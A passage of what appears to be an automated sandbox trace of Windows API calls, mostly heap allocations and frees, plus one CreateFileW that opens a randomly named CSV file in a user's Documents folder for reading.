[0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e30 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0076.718] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0076.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0076.720] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0076.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0076.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.722] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0076.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca658 [0076.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca658, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x43eb3a8 [0076.725] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\HD2UssJoRg1BYp.csv" (normalized: "c:\\users\\fd1hvy\\documents\\hd2ussjorg1byp.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0076.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ba0 [0076.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eb3a8 | out: hHeap=0x1780000) returned 1 [0076.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0076.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.727] FreeLibrary (hLibModule=0x772d0000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0076.728] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0076.728] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.729] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0076.729] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 